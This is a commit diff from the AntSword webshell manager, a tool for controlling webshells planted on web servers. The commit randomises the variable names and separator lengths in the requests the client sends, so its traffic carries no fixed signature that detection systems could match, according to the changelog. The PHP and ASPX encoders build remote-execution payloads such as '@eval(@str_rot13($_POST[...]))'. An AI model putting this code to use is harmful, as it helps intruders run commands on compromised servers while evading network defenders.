(Enhance: Core) 调整默认生成变量名规则

5e9e6722 · Medicean · 7caef68e · 5e9e6722 · 5e9e6722 · 5e9e6722
Commit 5e9e6722 authored Sep 03, 2019 by Medicean
10 changed files
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,9 +4,35 @@

 ## `v(2.1.6)`

+### 后端模块
+
+* 修复数据截取 Bug
+
 ### 核心模块

-* 数据分割字符随机化增强(随机内容,随机长度 5~12 位)
+* 数据分割字符随机化增强(随机内容, 随机长度 5~12 位), 避免客户端发包产生固定的 `Content-Length`
+* 新增 `antSword["RANDOMWORDS"]` 全局变量, 存放英文单词, 如需要定制字典请修改 `source/base/word.js`
+* 新增 `antSword["utils"]` 全局变量, 包函 `RandomChoice`, `RandomLowercase` 函数
+* 发包随机变量名去除 `_0x` 通用变量前缀
+* 核心模版发包键名支持随机英文单词
+
+### Shell 管理
+
+* 新增「使用随机英文单词变量」配置项, 在发包时非密码变量名会使用随机产生的英文单词 (thx @Ch1ngg)
+
+![ranword_1.png](https://i.loli.net/2019/09/03/vxVCiZ6znb2MGkt.png)
+
+未勾选此配置项时, 发包变量名如下:
+
+![randword_2.png](https://i.loli.net/2019/09/03/bEUonV3QXTa1pSD.png)
+
+勾选此项设置后, 发包变量名如下:
+
+![randword_3.png](https://i.loli.net/2019/09/03/iwRZF8gbh6WEdlO.png)
+
+* 新增常用插件功能面板, 可自定义配置常用插件到此面板, 快速调用
+
+![shell_toolbar.png](https://i.loli.net/2019/09/03/Wu82S65Oq3EPopt.png)

 ### 其它


--- a/package.json
+++ b/package.json
 {
  "name": "antsword",
-  "version": "2.1.5",
+  "version": "2.1.5.1",
  "description": "中国蚁剑是一款跨平台的开源网站管理工具",
  "main": "app.js",
  "dependencies": {

--- a/source/app.entry.js
+++ b/source/app.entry.js
@@ -280,6 +280,7 @@ antSword['CacheManager'] = CacheManager;
 antSword['Decodes'] = new Decodes();
 antSword['menubar'] = new Menubar();
 antSword['RANDOMWORDS'] = require('./base/words');
+antSword['utils'] = require('./base/utils');
 antSword['package'] = require('../package');

 // 加载模块列表

--- a/source/base/utils.js
+++ b/source/base/utils.js
+'use strict';
+
+/**
+ * 随机从列表返回指定长度的列表
+ * @param {array} array 待选列表
+ * @param {array} excludes 排除列表
+ * @param {int} len 返回的长度,默认 6
+ */
+function RandomChoice(array, excludes = [], len = 1) {
+  var tmp = [];
+  while (tmp.length < len) {
+    let v = array[Math.ceil(Math.random() * array.length - 1)];
+    excludes.indexOf(v) === -1 && tmp.indexOf(v) === -1 && tmp.push(v);
+  }
+  return tmp;
+}
+
+/**
+ * 随机生成小写字母
+ * @param {int} len 长度,默认1
+ */
+function RandomLowercase(len = 1) {
+  var result = [];
+  for (var i = 0; i < len; i++) {
+    var ranNum = Math.ceil(Math.random() * 25); //生成一个0到25的数字
+    result.push(String.fromCharCode(97 + ranNum));
+  }
+  return result.join('');
+}
+
+module.exports = {
+  RandomChoice,
+  RandomLowercase,
+};
\ No newline at end of file
--- a/source/base/words.js
+++ b/source/base/words.js
@@ -56,20 +56,20 @@ const RANDOMWORDS = [
    "bookkeeping",
    "boolean",
    "border",
-    "bottom-up",
+    "bottom_up",
    "bound",
    "bounds",
    "box",
    "brace",
    "bracket",
    "branch",
-    "breadth-first",
+    "breadth_first",
    "breakpoint",
    "brevity",
    "buffer",
    "bug",
    "building",
-    "built-in",
+    "built_in",
    "byte",
    "bytecode",
    "cache",
@@ -96,9 +96,9 @@ const RANDOMWORDS = [
    "code",
    "collection",
    "column",
-    "column-major",
+    "column_major",
    "comma",
-    "command-line",
+    "command_line",
    "Common",
    "compatible",
    "compilation",
@@ -129,7 +129,7 @@ const RANDOMWORDS = [
    "constant",
    "constraint",
    "container",
-    "content-based",
+    "content_based",
    "context",
    "continuation",
    "continuous",
@@ -151,7 +151,7 @@ const RANDOMWORDS = [
    "dangling",
    "data",
    "database",
-    "data-driven",
+    "data_driven",
    "datagram",
    "dead",
    "debug",
@@ -174,7 +174,7 @@ const RANDOMWORDS = [
    "dellocate",
    "demarshal",
    "deprecated",
-    "depth-first",
+    "depth_first",
    "derived",
    "design",
    "designator",
@@ -190,7 +190,7 @@ const RANDOMWORDS = [
    "DLL",
    "document",
    "dotted",
-    "dotted-pair",
+    "dotted_pair",
    "duplicate",
    "dynamic",
    "effect",
@@ -210,7 +210,7 @@ const RANDOMWORDS = [
    "equation",
    "equivalence",
    "error",
-    "error-checking",
+    "error_checking",
    "escape",
    "escaped",
    "evaluate",
@@ -235,15 +235,15 @@ const RANDOMWORDS = [
    "field",
    "file",
    "fill",
-    "fineo-grained",
+    "fineo_grained",
    "firmware",
-    "first-class",
-    "fixed-point",
+    "first_class",
+    "fixed_point",
    "fixnum",
    "flag",
    "flash",
    "flexibility",
-    "floating-point",
+    "floating_point",
    "flush",
    "fold",
    "font",
@@ -275,14 +275,14 @@ const RANDOMWORDS = [
    "handle",
    "hard",
    "hardware",
-    "hard-wire",
+    "hard_wire",
    "hash",
    "header",
    "heap",
    "helper",
    "heuristic",
-    "higher-order",
-    "high-order",
+    "higher_order",
+    "high_order",
    "hyperlink",
    "HyperText",
    "identical",
@@ -325,7 +325,7 @@ const RANDOMWORDS = [
    "interpolation",
    "interpret",
    "interpreter",
-    "inter-process",
+    "inter_process",
    "interrupt",
    "intersection",
    "invariants",
@@ -380,10 +380,10 @@ const RANDOMWORDS = [
    "memory",
    "menu",
    "message",
-    "message-passing",
-    "meta-",
+    "message_passing",
+    "meta_",
    "metacircular",
-    "meta-programming",
+    "meta_programming",
    "method",
    "micro",
    "middleware",
@@ -401,7 +401,7 @@ const RANDOMWORDS = [
    "monomorphic",
    "mouse",
    "multiple",
-    "multi-task",
+    "multi_task",
    "mutable",
    "mutex",
    "namespace",
@@ -412,11 +412,11 @@ const RANDOMWORDS = [
    "newline",
    "nondeclarative",
    "nondestructive",
-    "non-deterministic",
-    "non-strict",
+    "non_deterministic",
+    "non_strict",
    "number",
    "object",
-    "object-oriented",
+    "object_oriented",
    "on",
    "online",
    "open",
@@ -440,7 +440,7 @@ const RANDOMWORDS = [
    "parallel",
    "param",
    "parameter",
-    "paren-matching",
+    "paren_matching",
    "parent",
    "parentheses",
    "parse",
@@ -452,7 +452,7 @@ const RANDOMWORDS = [
    "pattern",
    "perform",
    "performance",
-    "performance-critical",
+    "performance_critical",
    "persistence",
    "phrenology",
    "physical",
@@ -520,8 +520,8 @@ const RANDOMWORDS = [
    "rational",
    "raw",
    "read",
-    "read-evaluate-print",
-    "read-macro",
+    "read_evaluate_print",
+    "read_macro",
    "record",
    "recursion",
    "recursive",
@@ -549,10 +549,10 @@ const RANDOMWORDS = [
    "robustness",
    "routine",
    "routing",
-    "row-major",
-    "run-length",
+    "row_major",
+    "run_length",
    "runtime",
-    "run-time",
+    "run_time",
    "rvalue",
    "save",
    "scaffold",
@@ -576,10 +576,10 @@ const RANDOMWORDS = [
    "serialization",
    "series",
    "server",
-    "S-expression",
+    "S_expression",
    "shadowing",
    "sharp",
-    "sharp-quote",
+    "sharp_quote",
    "shortest",
    "SICP",
    "side",
@@ -587,7 +587,7 @@ const RANDOMWORDS = [
    "simple",
    "simulate",
    "Single",
-    "single-segment",
+    "single_segment",
    "sketch",
    "slash",
    "slot",
@@ -641,8 +641,8 @@ const RANDOMWORDS = [
    "system",
    "table",
    "tag",
-    "tail-recursion",
-    "tail-recursive",
+    "tail_recursion",
+    "tail_recursive",
    "TAOCP",
    "target",
    "taxable",
@@ -652,13 +652,13 @@ const RANDOMWORDS = [
    "testing",
    "text",
    "thread",
-    "three-valued",
+    "three_valued",
    "throw",
    "throwaway",
    "timestamp",
    "token",
-    "top-down",
-    "top-level",
+    "top_down",
+    "top_level",
    "trace",
    "trailing",
    "transaction",

--- a/source/core/aspx/encoder/base64.js
+++ b/source/core/aspx/encoder/base64.js
@@ -7,10 +7,12 @@
 'use strict';

 module.exports = (pwd, data, ext = null) => {
-  let randomID = `_0x${Math
-    .random()
-    .toString(16)
-    .substr(2)}`;
+  let randomID;
+  if (ext.opts.otherConf['use-random-variable'] === 1) {
+    randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+  } else {
+    randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+  }
  data[randomID] = Buffer
    .from(data['_'])
    .toString('base64');

--- a/source/core/aspx/encoder/hex.js
+++ b/source/core/aspx/encoder/hex.js
@@ -7,10 +7,12 @@
 'use strict';

 module.exports = (pwd, data, ext = null) => {
-    let randomID = `_0x${Math
-        .random()
-        .toString(16)
-        .substr(2)}`;
+    let randomID;
+    if (ext.opts.otherConf['use-random-variable'] === 1) {
+        randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+    } else {
+        randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+    }
    let hexencoder = "function HexAsciiConvert(hex:String) {var sb:System.Text.StringBuilder = new Sys" +
        "tem.Text.StringBuilder();var i;for(i=0; i< hex.Length; i+=2){sb.Append(System.Co" +
        "nvert.ToString(System.Convert.ToChar(Int32.Parse(hex.Substring(i,2), System.Glob" +

--- a/source/core/base.js
+++ b/source/core/base.js
@@ -109,9 +109,9 @@ class Base {
    if (this.__opts__.otherConf["use-random-variable"] == 1) {
      // 随机返回单词, 排除 body 和 pwd
      let excludes = Object.keys(this.__opts__.httpConf.body).concat(this.__opts__.pwd);
-      return this.getRandomVariable(antSword['RANDOMWORDS'], excludes, 6);
+      return antSword['utils'].RandomChoice(antSword['RANDOMWORDS'], excludes, 6);
    } else {
-      random = () => `${(Math.random() + Math.random()).toString(16).substr(2)}`; // 返回六个随机变量名数组
+      random = () => `${antSword['utils'].RandomLowercase()}${(Math.random() + Math.random()).toString(16).substr(2)}`; // 返回六个随机变量名数组
      return [
        random(),
        random(),

--- a/source/core/php/encoder/base64.js
+++ b/source/core/php/encoder/base64.js
@@ -7,10 +7,12 @@

 module.exports = (pwd, data, ext = null) => {
  // 生成一个随机变量名
-  let randomID = `_0x${Math
-    .random()
-    .toString(16)
-    .substr(2)}`;
+  let randomID;
+  if (ext.opts.otherConf['use-random-variable'] === 1) {
+    randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+  } else {
+    randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+  }
  data[randomID] = Buffer
    .from(data['_'])
    .toString('base64');

--- a/source/core/php/encoder/rot13.js
+++ b/source/core/php/encoder/rot13.js
@@ -20,10 +20,12 @@ module.exports = (pwd, data, ext = null) => {
  }

  // 生成一个随机变量名
-  let randomID = `_0x${Math
-    .random()
-    .toString(16)
-    .substr(2)}`;
+  let randomID;
+  if (ext.opts.otherConf['use-random-variable'] === 1) {
+    randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+  } else {
+    randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+  }
  data[randomID] = encode(data['_']);
  data[pwd] = `@eval(@str_rot13($_POST[${randomID}]));`;
  delete data['_'];